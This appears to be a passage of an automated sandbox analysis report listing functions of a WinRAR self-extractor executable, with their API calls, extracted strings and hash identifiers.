api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF731CA29AC
kernel32.dll, xrefs: 00007FF731CA29C1
SleepConditionVariableCS, xrefs: 00007FF731CA29D6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
Instruction ID: 1f1874c078e45d069f963ad9abcf1e07e92cec85391c74ae7df0b639e52e9411
Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
Instruction Fuzzy Hash: CE214C20E0AA03B1FB15FB60E865175A3A0BF48B80FE44434C90E426A0DFBCA855A320

Function 00007FF731C869CC Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87066

Part of subcall function 00007FF731C72004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF731C7200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87072
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87078
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87084
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C87096
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8709C

Strings

\\?\, xrefs: 00007FF731C86A17, 00007FF731C86A26
UNC, xrefs: 00007FF731C86B7F
DXGIDebug.dll, xrefs: 00007FF731C869D8

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: bfc30a2d9763371fa05dc3689b9f97feb0316accffdd2e59997247909b7df4a9
Instruction ID: a5c3ac1b7bf9e6a9823ae33bbdfc2a3b305edc03688e319b43002049f1ebaf6b
Opcode Fuzzy Hash: bfc30a2d9763371fa05dc3689b9f97feb0316accffdd2e59997247909b7df4a9
Instruction Fuzzy Hash: 3F12D122F08B46A4EB10EB69D4841ADA371FB81B88FA04136DB5D07EE9DFBCD546D350

Function 00007FF731C9A3C0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C7129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C71396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9A6AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9A6B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9A6BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9A6C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9A6C7
EndDialog.USER32 ref: 00007FF731C9A73A

Strings

Software\WinRAR SFX, xrefs: 00007FF731C9A4AB, 00007FF731C9A4BA
GETPASSWORD1, xrefs: 00007FF731C9A6F3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: b078900cb13599d62c0801072d2a32f62caee5a0f070c48cbb4a346a8e4dbcf7
Instruction ID: 579e96d7ecc1b88683c97a37c1cc2d7e5f7531449bd324f6ed405b47c29c20d2
Opcode Fuzzy Hash: b078900cb13599d62c0801072d2a32f62caee5a0f070c48cbb4a346a8e4dbcf7
Instruction Fuzzy Hash: A9B1D462F08B82A5FB00EB74D4442BCA372EB84794FA05235DE1C26AD9EFBCE555D350

Function 00007FF731C96E00 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF731C97E1B), ref: 00007FF731C97000
CreateStreamOnHGlobal.COMBASE ref: 00007FF731C97031
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C970FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C97101
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C97107

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF731C96EAC, 00007FF731C96EBB
</html>, xrefs: 00007FF731C96EF2, 00007FF731C96F01
<html>, xrefs: 00007FF731C96E93
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF731C96E55, 00007FF731C96E64

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2868844859-1533471033
Opcode ID: c260321460ef5b9ecb46faae32cf6e49ce157a8f6490be7222d78fb8d8663caa
Instruction ID: dd3ce80af190de66af83955c14fcd5d0571cbccc84cedeee5f899231bd16f27c
Opcode Fuzzy Hash: c260321460ef5b9ecb46faae32cf6e49ce157a8f6490be7222d78fb8d8663caa
Instruction Fuzzy Hash: 2081D062F08B42A5FB00EBB5D8402ECA371AF44B94FE04535CE1D176DAEEB8E506D320

Function 00007FF731CAE5D0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CAE74D

Strings

NAN(IND), xrefs: 00007FF731CAE67B
NAN(SNAN), xrefs: 00007FF731CAE665
INF, xrefs: 00007FF731CAE643
nan(snan), xrefs: 00007FF731CAE670
nan, xrefs: 00007FF731CAE638
nan(ind), xrefs: 00007FF731CAE686
inf, xrefs: 00007FF731CAE656
NAN, xrefs: 00007FF731CAE631

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
Instruction ID: 2949ca4d58b225afdeec01dd7777e3869fba28ae4e97b476352ab4f2106aa6ea
Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
Instruction Fuzzy Hash: 5D41BA32E09B85A9F701DF25E8417ED73A4EB08398FA04936EE9C47B84DE78D425C394

Function 00007FF731C9F310 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF731C9F34F
GetClassNameW.USER32 ref: 00007FF731C9F37C
GetWindowLongPtrW.USER32 ref: 00007FF731C9F39D
SendMessageW.USER32 ref: 00007FF731C9F3B7
GetObjectW.GDI32 ref: 00007FF731C9F3D2
SendMessageW.USER32 ref: 00007FF731C9F407
DeleteObject.GDI32 ref: 00007FF731C9F410
GetWindow.USER32 ref: 00007FF731C9F41E

Strings

STATIC, xrefs: 00007FF731C9F382

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassDeleteLongName
String ID: STATIC
API String ID: 2845197485-1882779555
Opcode ID: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
Instruction ID: 008de5dab755d0469b84d860233cc564c7baaa3518c54df922f554b0d224eb7e
Opcode Fuzzy Hash: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
Instruction Fuzzy Hash: 7331B426F0864296FB60BB12A5547B9A391BF89BD0FE40430DD4D07B55EEBCE502A760

Function 00007FF731C9AE10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF731C9AE2E

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: ItemTextWindow
String ID: LICENSEDLG
API String ID: 2478532303-2177901306
Opcode ID: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
Instruction ID: 6bc5834664155ed6929c5f24cf15c4a238561fe36a4f0d5bff2622798353ccfe
Opcode Fuzzy Hash: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
Instruction Fuzzy Hash: 3D41C332F0C652A2FB54BB55A804379A391AF84F80FE41035D90E03B95DFBCE956E321

Function 00007FF731C8B970 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF731C8B9CE
GetProcAddress.KERNEL32 ref: 00007FF731C8B9E9
GetCurrentProcessId.KERNEL32 ref: 00007FF731C8BA86

Part of subcall function 00007FF731C8DF4C: GetSystemDirectoryW.KERNEL32 ref: 00007FF731C8DD5B

Strings

CryptProtectMemory, xrefs: 00007FF731C8B9C4
CryptUnprotectMemory, xrefs: 00007FF731C8B9DB
Crypt32.dll, xrefs: 00007FF731C8B9AC
CryptUnprotectMemory failed, xrefs: 00007FF731C8BA7D
CryptProtectMemory failed, xrefs: 00007FF731C8BA3C

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
Instruction ID: 27f9f53707db79ef8089a6005d085bc14a15e9b2dc992f2e5dd66519cd1706c4
Opcode Fuzzy Hash: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
Instruction Fuzzy Hash: 4D315C61E09B53B1FB14FB16A8912B5E3A0BF49B94FE44135C95D43BA0DEBCE441B320

Function 00007FF731C98758 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C98D36
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C98D42
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C98D4E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C98D5A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C98D60

Strings

, xrefs: 00007FF731C9883E
, xrefs: 00007FF731C989D5

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: 4595b3364d3afe6788a6be0f0336865034914281edadcaa22e865f46ac2c6e14
Instruction ID: ef7d3a3ad8529c4dd6aa3c4e9e43649c3d33ee60066b035da25b6817058e0299
Opcode Fuzzy Hash: 4595b3364d3afe6788a6be0f0336865034914281edadcaa22e865f46ac2c6e14
Instruction Fuzzy Hash: 1FF1E563F1474AA0EF04AB64D4481BCA361BB45BA8FA05631CB5D17BD5EFBCE190E360

Function 00007FF731CA576C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF731CA590A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF731CA5C2D
abort.LIBCMT ref: 00007FF731CA5C61

Strings

csm, xrefs: 00007FF731CA5851
csm, xrefs: 00007FF731CA5931
csm, xrefs: 00007FF731CA58B3

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
Instruction ID: 86cde26dcb18e6d0ca6596838d37d55fe75d7b36b73aeb7e3df24942af8f890d
Opcode Fuzzy Hash: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
Instruction Fuzzy Hash: DAE1D172D087829AE712AF74D4803BDB7B0FB44758FA48935DA8D47A96CF78E481D710

Function 00007FF731C84EF8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C84DE4: SysAllocString.OLEAUT32 ref: 00007FF731C84E1F

VariantClear.OLEAUT32 ref: 00007FF731C850E5

Strings

Name, xrefs: 00007FF731C850B9
ROOT\CIMV2, xrefs: 00007FF731C84F3B
WQL, xrefs: 00007FF731C84FEA
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF731C84FD7
Windows 10, xrefs: 00007FF731C850CA

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AllocClearStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1959693985-3505469590
Opcode ID: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
Instruction ID: 24cce6f186e89a1d3bc0f0f5037b338efc02208f4b29126fdaf0935b373ac755
Opcode Fuzzy Hash: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
Instruction Fuzzy Hash: 19714E36E14B0595EB10EF65D8805ADB7B0FB88B98BA45136EE4E43B68CFBCD144D710

Function 00007FF731CA726C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA72F1
GetLastError.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA72FF
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA7329
FreeLibrary.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA736F
GetProcAddress.KERNEL32(?,?,00000000,00007FF731CA7473,?,?,?,00007FF731CA51DE,?,?,?,00007FF731CA5199), ref: 00007FF731CA737B

Strings

api-ms-, xrefs: 00007FF731CA7311

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
Instruction ID: 79bd4cbc5a56d61238feefdddb662ffa5d7028c61832b408863729f22c9af574
Opcode Fuzzy Hash: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
Instruction Fuzzy Hash: 3E31C521E1B742A1EF12FB42A801579A394FF44FA0FAA4A35DD1D47750DFBCE4409720

Function 00007FF731CA1584 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15AB
GetProcAddress.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15C8
GetProcAddress.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15E4

Strings

KERNEL32.DLL, xrefs: 00007FF731CA15A4
ReleaseSRWLockExclusive, xrefs: 00007FF731CA15D3
AcquireSRWLockExclusive, xrefs: 00007FF731CA15BE

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
Instruction ID: aef6a6d566a872227ad77b3e5de7195acfaffc9bb84bc0db6dafe74fc8c3843d
Opcode Fuzzy Hash: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
Instruction Fuzzy Hash: 79110C61E0EB02B1FF52AB41A540275E395AF08794FFC9934C95E87764FEBCA444A330

Function 00007FF731C8ECA4 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C85164: GetVersionExW.KERNEL32 ref: 00007FF731C85195

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED0C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED18
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED28
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED36
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED44
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF731C75ABC), ref: 00007FF731C8ED85

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
